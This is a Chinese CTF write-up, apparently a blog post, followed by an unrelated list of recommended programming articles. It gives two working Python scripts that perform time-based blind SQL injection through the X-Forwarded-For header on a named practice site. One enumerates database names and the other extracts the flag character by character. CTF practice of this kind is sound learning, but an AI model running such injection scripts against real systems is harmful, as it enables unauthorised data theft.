不多说,直接使用脚本跑

 # -*- coding:utf-8 -*-

 import requests

 import string

 url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"

 guess = string.lowercase+string.uppercase+string.digits+string.punctuation

 database=[]

 for database_number in range(0,100): #假设爆破前100个库

 databasename=''

 for i in range(1,100): #爆破字符串长度,假设不超过100长度

 flag=0

 for str in guess: #爆破该位置的字符

 #print 'trying ',str

 headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}

 try:

 res=requests.get(url,headers=headers,timeout=4)

 except:

 databasename+=str

 flag=1

 print '正在爆破第%d个数据库名,the databasename now is '%(database_number+1) ,databasename

 break

 if flag==0:

 break

 database.append(databasename)

 if i==1 and flag==0:

 print '扫描完成'

 break

 for i in range(len(database)):

 print database[i]

获取数据库名称

然后再获取数据表,列,flag

 #-*-coding:utf-8-*-import requestsimport string

 url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"

 guess=string.lowercase + string.uppercase + string.digits

 flag=""

 for i in range(1,100):

 havetry=0

 for str in guess:

 headers={"x-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}

 try:

 res=requests.get(url,headers=headers,timeout=6)

 except requests.exceptions.ReadTimeout, e:

 havetry=1

 flag = flag + str

 print "flag:", flag

 break

 if havetry==0:

 breakprint 'result:' + flag

获取flag

(flag有点长,要跑一会儿)

随机推荐

  1. Windows下libevent C++封装类实现

    题记 windows平台下对于服务器高并发的网络模型选型中,使用libevent是个不错的选择. 本文的背景基于:国内博客对于libevent大多介绍linux实现,大多是c语言的实现,Windows ...

  2. CSS3 GENERATOR可以同时为一个元素完成border-radius、box-shadow、gradient和opacity多项属性的设置

    CSS3 GENERATOR可以同时为一个元素完成border-radius.box-shadow.gradient和opacity多项属性的设置 CSS3 GENERATOR 彩蛋爆料直击现场 CS ...

  3. Delphi Berlin 10.1.2 FMX用TMessageManager处理自定义消息

    看FMX代码,发现有两种消息处理的实现方式,一种是用TMessageManager来实现自定义的消息,另外一种象TEdit中的实现,直接声明消息方法.   早前,看过文章说TMessageManage ...

  4. c++用参数返回堆上的空间

    <高质量c++和c编程>7.4 指针参数是如何传递内存的一节中写道 void GetMemory(char *p, int num) { p = (char *)malloc(sizeof ...

  5. C#中await/async闲说

    自从C#5.0增加异步编程之后,异步编程越来越简单,async和await用的地方越来越多,越来越好用,只要用异步的地方都是一连串的异步,如果想要异步编程的时候,需要从底层开始编写,这样后边使用的时候 ...

  6. Tido c++树状数组知识讲解(转载)

    树状数组可以用来动态计算前缀和,可以随时进行更新 而普通的前缀和只是静态的         

  7. redission-tomcat:快速实现从单机部署到多机部署

    原文地址: http://blog.jboost.cn/2019/06/29/session-redis.html 一些项目初期出于简单快速,都是做单机开发与部署,但是随着业务的扩展或对可用性要求的提 ...

  8. RestTemplate使用不当引发的问题分析

    背景 系统: SpringBoot开发的Web应用: ORM: JPA(Hibernate) 接口功能简述: 根据实体类ID到数据库中查询实体信息,然后使用RestTemplate调用外部系统接口获取 ...

  9. 干货!Git 如何使用多个托管平台管理代码

    考虑到github不能免费创建私有仓库原因,最近开始在使用码云托管项目,这样避免了连接数据库的用户密码等信息直接暴露在公共仓库中.今天突然想到一个点,就是能不能同时把代码推送到github和码云上呢? ...

  10. 【需要重新维护】Redis笔记20170811视频

    很多内容都是抄的,个人记录 1.windows下初见 安装 进入目录 修改配置文件(暂时使用默认,未配置环境变量) 目录下:redis-server.exe启动服务 新建命令提示符,目录下,redis ...